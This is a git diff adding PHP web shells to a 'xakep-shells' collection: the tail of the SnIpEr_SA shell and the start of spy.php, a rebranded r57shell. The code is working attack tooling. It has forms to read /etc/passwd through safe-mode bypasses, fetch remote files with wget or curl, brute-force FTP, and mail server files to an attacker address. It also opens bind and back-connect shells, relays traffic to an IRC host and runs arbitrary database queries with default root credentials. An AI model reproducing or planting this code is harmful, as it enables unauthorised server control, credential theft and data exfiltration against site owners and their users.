+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$unix&&function_exists('mb_send_mail')){
+echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_list')){
+echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_body')){
+echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts;
+echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
+echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode&&$unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts;
+echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
+$arh = $lang[$language.'_text92'];
+if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
+if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
+if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
+echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo $te.'</div>'.$table_end1.$fe;
+if(@function_exists("ftp_connect")){
+echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($unix && @function_exists("ftp_connect")){
+echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts;
+echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo sr(15,"","<font face=tahoma size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
+echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@function_exists("mail")){
+echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
+echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+$select = '<select name=db>';
+if($mysql_on) $select .= '<option>MySQL</option>';
+if($mssql_on) $select .= '<option>MSSQL</option>';
+if($pg_on)    $select .= '<option>PostgreSQL</option>';
+if($ora_on)   $select .= '<option>Oracle</option>';
+$select .= '</select>';
+echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
+}
+if(!$safe_mode&&$unix){
+echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=tahoma size=-2><b>o---[ SnIpEr_SA Shell  | <a href=http://3asfh.net>http://3asfh.net</a> | <a SnIpEr.SA@hotmail.com>sniper.sa@hotmail.com</a> | ����� ������ ]---o</b></font></div></td></tr></table>".$f;
+
+
+$u1p=""; // File to Include... or use _GET _POST
+$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
+
+
+
+echo "<PRE>\n";
+if(empty($snn)){
+if(empty($_GET['snn'])){
+if(empty($_POST['snn'])){
+die("\nSnIpEr_SA");
+} else {
+$u1p=$_POST['snn'];
+}
+} else {
+$u1p=$_GET['snn'];
+}
+}
+
+$temp=tempnam($tymczas, "cx");
+
+if(copy("compress.zlib://".$snn, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "".htmlspecialchars($tekst)."";
+unlink($temp);
+
+} else {
+die("<FONT COLOR=\"RED\"><CENTER>
+<B>".htmlspecialchars($u1p)."</B> ����! ����� ��� ����� �� ��� ���� �������� ������.</CENTER></FONT>");
+}
+
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/spy.php.php.txt b/xakep-shells/PHP/spy.php.php.txt
new file mode 100644
index 0000000..a5b232c
--- /dev/null
+++ b/xakep-shells/PHP/spy.php.php.txt
@@ -0,0 +1,1889 @@
+<?php
+/******************************************************************************************************/
+/* 
+/* 
+/*    ssssssss  pppp  pppp    yyyyyy  yyyyyy    gggg  gggg  rrrr  rrrr  uuuu    uuuu  pppp  pppp  
+/*  ss            pppp    pp    yy      yy    gg    gggg      rrrr        uu      uu    pppp    pp
+/*   ssssss      pp      pp      yy  yy      gg      gg      rr          uu      uu    pp      pp
+/*         ss    pp      pp      yy  yy      gg      gg      rr          uu    uuuu    pp      pp
+/* ssssssss      pppppppp          yy          gggggggg    rrrrrrrr        uuuu  uuuu  pppppppp  
+/*               pp                yy                gg                                pp        
+/*             pppppp          yyyyyy          gggggg                                pppppp      
+/* 
+/*                    admin@spygrup.org[Kruis]   -   yaduris@spygrup.org[YaduriS]
+/*
+/*
+/*  r57shell.php - скрипт на пхп позволяющий вам выполнять шелл команды  на сервере через браузер
+/*  Версия: 1.23
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/******************************************************************************************************/
+
+/* ~~~ Настройки  ~~~ */
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = "SpyGrup.Org SpeciaL";
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_SERVER as $k=>$v)
+  {
+  $_SERVER[$k] = stripslashes($v);
+  }
+ }
+
+/* ~~~ Аутентификация ~~~ */
+
+// $auth = 1; - Аутентификация включена
+// $auth = 0; - Аутентификация выключена
+$auth = 0;
+
+// Логин и пароль для доступа к скрипту
+// НЕ ЗАБУДЬТЕ СМЕНИТЬ ПЕРЕД РАЗМЕЩЕНИЕМ НА СЕРВЕРЕ!!!
+$name='teufel'; // логин пользователя
+$pass='spyms'; // пароль пользователя
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="shell"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b><a href=http://www.spygrup.org>www.spygrup.org</a> : Access Denied</b>");
+   }
+}
+$head = '<!-- Здравствуй  Вася -->
+<html>
+<head>
+<title>shell</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+.table1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+BACKGROUND-COLOR: #D4D0C8;
+}
+.td1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+font: 7pt Verdana;
+}
+.tr1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+}
+table {
+BORDER-RIGHT:  #eeeeee 1px outset;
+BORDER-TOP:    #eeeeee 1px outset;
+BORDER-LEFT:   #eeeeee 1px outset;
+BORDER-BOTTOM: #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>';
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if ($_POST['cmd']=="db_query")
+ {
+  echo $head;
+  switch($_POST['db'])
+  {
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   	if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mysql_query($query,$db);
+      $error = @mysql_error($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@mysql_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mysql_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @mysql_free_result($res);
+      }
+     }
+   	@mysql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>";
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   	if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mssql_query($query,$db);
+      if (@mssql_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mssql_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */
+      @mssql_free_result($res);
+      }
+     }
+   	@mssql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
